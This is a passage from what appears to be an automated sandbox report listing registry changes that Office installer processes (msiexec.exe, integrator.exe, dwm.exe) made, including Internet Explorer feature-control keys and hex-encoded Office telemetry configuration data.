\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_ACTIVEXINSTALL\OSPPREARM.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT\OSPPREARM.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\OSPPREARM.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_OBJECT_CACHING\LICLUA.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\OSPPREARM.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_OBJECT_CACHING msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\OSPPREARM.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING\OSPPREARM.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SECURITYBAND\OSPPREARM.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT\OSPPREARM.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\OSPPREARM.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_ACTIVEXINSTALL msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\LICLUA.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\OSPPREARM.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_OBJECT_CACHING\OSPPREARM.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\OSPPREARM.EXE = "1" msiexec.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun integrator.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|2" integrator.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\integrator.exe\ULSMonitor integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata integrator.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" integrator.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun integrator.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata integrator.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|7" integrator.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|13" integrator.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\integrator.exe integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.7 = 7669636548656c706572476574486f73744361706162696c69746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e6447657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e644765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065724765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e645365744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065725365744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e644765745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065724765745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e645365745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065725365745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572436865636b5065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657453686172696e67496e666f726d6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572426567696e5365745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657453686172696e6756657273696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d6f6465726e4261636b73746167655c22203a207b205c224576656e74735c22203a207b205c224261636b737461676550616765436f6e74726f6c55736572437265617465436f6e74726f6c557365725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224465736b746f704261636b73746167654e617669676174696f6e5c22203a207b205c224576656e74735c22203a207b205c224e617669676174696f6e5461736b496e766f6b655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225461736b496e766f6b654f6e52656164466f6c6465725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224465736b746f7053686172696e675c22203a207b205c224576656e74735c22203a207b205c22436f6c6c616250616e6555736572536574436f6c6c616250616e654d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c616250616e6555736572436c69636b53686172696e674c696e6b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c616250616e6555736572497343757272656e74446f63456e746572707269736550726f7465637465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e7473536861726564576974684d655c22203a207b205c224576656e74735c22203a207b205c22446f63756d656e7473536861726564576974684d6552657175657374446f63756d656e7473536861726564576974684d654173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7473536861726564576974684d6552657175657374436163686564446f63756d656e7473536861726564576974684d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7473536861726564576974684d654964656e74697479436163686552657175657374526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7473536861726564576974684d6552657175657374436163686564446f63756d656e7473466f724661696c757265735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22486973746f727955585c22203a207b205c224576656e74735c22203a207b205c224163746976697479506167654d616e6167657252656769737465725669736962696c697479436f6e74726f6c6c65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224275734261724f70656e4c6f63616c56657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434163746976697469657341676772656761746f72496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434163746976697469657341676772656761746f7252657475726e4572726f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243437369446f63756d656e74537461746545787465726e616c556e7265676973746572446f63756d656e744c697374656e65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243486973746f727941637469766974696573466163746f727952656672657368416674657252656e616d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f62616c744163746976697469657346696c6556657273696f6e4c697374557064617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243536f61704461746150726f7669646572496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765436c6f73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765436f707956657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765436f707956657273696f6e496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f7279506167654372656174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765526573746f726556657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f72795061676553656c65637456657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616e654e6f6e436c69636b61626c654974656d53656c65637465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f63616c41637469766974696573426567696e526566726573685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6666696365436f6c6c61624163746976697479436f6d6d616e644d534f446f63756d656e7450726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e74436865636b4f757446696c65546f4c6f63616c466f6c6465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f67676c65486964655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f67676c6553686f775c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225759574143616c6c6f757453686f7743616c6c6f75745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e416374697669747943616c6c6f757450726573656e7443616c6c6f75745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e41637469766974794765744c6173745669657754696d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e416374697669747946696e6443757272656e74557365724c6f67696e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e416374697669747943616c6c6f7574436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253686f77536d616c6c53637265656e435759574143616c6c6f75745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d7275416461707465725c22203a207b205c224576656e74735c22203a207b205c224872416464446f63756d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c6163655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464446f63756d656e74576974684f7074696f6e7357697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c616365576974684f7074696f6e7357697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464446f63756d656e745061746857697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c6163655061746857697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464446f63756d656e74496e6465785c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c616365496e6465785c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22487252656d6f7665506174685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464576974684f7074696f6e7357697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22417070446f63735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745c22203a207b205c225375624e616d657370616365735c22203a207b205c2241637469766174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6173744f70656e6564446f63756d656e744d657461646174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d6f6465726e446f6354656d706c617465536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225361766550726f6d707448656c7065725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e74436861745c22203a207b205c224576656e74735c22203a207b205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572436f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572436f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572446973636f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572446973636f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e65725265667265736850657273697374656e7453746174654173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e65725265667265736850657273697374656e7453746174654173796e63496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e65725265667265736850657273697374656e7453746174654173796e6352657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e657253746172745265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e657253746f705265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572436f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572436f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572446973636f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572446973636f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e7453746174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e745374617465496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e74537461746552657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e7453746174655265747279496e6e65724c6f6f705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f61646361737465725265667265736850657273697374656e7453746174654173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f616463617374657253746172745265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f616463617374657253746f705265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253686172696e6755495c22203a207b205c225375624e616d657370616365735c22203a207b205c22436f6c6c616250616e65557365725c22203a207b205c224576656e74735c22203a207b205c22536861726550616e65436f6d706c657465446973706c61795c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2253686172654469616c6f675c22203a207b205c224576656e74735c22203a207b205c224e61766967617465546f5765624469616c6f675c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e6441734174746163686d656e745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d2c205c224544505c22203a207b205c224576656e74735c22203a207b205c22506f6c6963794d657461646174615c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c225369746573536572766963654170695c22203a207b205c224576656e74735c22203a207b205c22526571756573744173796e635c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225265616446726f6d43616368655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d2c205c224576656e74735c22203a207b205c22536861726564436f6d6d656e74735f447261667443617264556e6d6f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224544502a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e44796e616d696343616e766173222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224f7574537061636543616e7661735c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2250726f677265737355695c22203a207b205c224576656e74735c22203a207b205c22556e6578706f727461626c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578706f727461626c655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2243616e7661735c22203a207b205c225375624e616d657370616365735c22203a207b205c225765624469616c6f675c22203a207b205c225375624e616d657370616365735c22203a207b205c2242726f777365724576656e7448616e646c6572 integrator.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.10 = 2c205c224c6f63616c446f63756d656e74496e666f466c796f757444726f707065645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2248616e646c65417574684661696c7572655f5573654578697374696e6743726564735f47656e657269634661696c7572655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f4f4c446f6342617365476574504b4d436c69656e7445785c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f536572766572496e666f476574536572766572496e666f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745265636f766572794872476574447270436f72655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745265636f766572794d736f4872426567696e4d6f646966794472705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225469746c654261725361766555694d616e616765725772697465537461747573546f5469746c654261725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164437369446c6c466f72436c69636b3252756e456e7669726f6e6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2249735365727665724361636865645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d616e75616c5361766555736167655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246696c6553746f72655c22203a207b205c224576656e74735c22203a207b205c22465344436f7272757074696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2247617262616765436f6c6c656374696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225a65726f4279746546696c6555706c6f6164417474656d707465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c2252756e74696d6550726f706572746965735c22203a207b205c224576656e74735c22203a207b205c22496e636f6d70617469626c6543736956657273696f6e44657465637465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c224f66666963655c22203a207b205c225375624e616d657370616365735c22203a207b205c2246696c65494f5c22203a207b205c225375624e616d657370616365735c22203a207b205c224353495c22203a207b205c225375624e616d657370616365735c22203a207b205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2243616368654f707469637356325c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d2c205c224d6f6373695c22203a207b205c224576656e74735c22203a207b205c22557064617465486f73745469705c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4772617068696373222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22415243457863657074696f6e53636f70655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2245326f5669657752656e646572506572666f726d616e636541637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224172745669657756616c69646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f6669745368617065546f54657874436d645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f704c6576656c456666656374447261775c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174654269746d617046726f6d506c6174666f726d4269746d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e6b496e70757453757266616365426173655570646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e53696d706c65506174685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224776697a536d61727441727450726f7065727469657354656c656d657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726561746544657669636544334431305c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22537065637472655472616e73636f646541637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e73657274496e646976696475616c4d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61646564496d61676550726f706572746965735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e736572744d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22537065637472654372656174655363656e6541637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d6f64656c334452656e64657241637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4964656e74697479222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22456e7375726550726f7669646572496e697465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574506572736f6e50726f66696c6553657475705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224964656e74697479536e617073686f745c22203a207b205c224576656e74466c61675c22203a2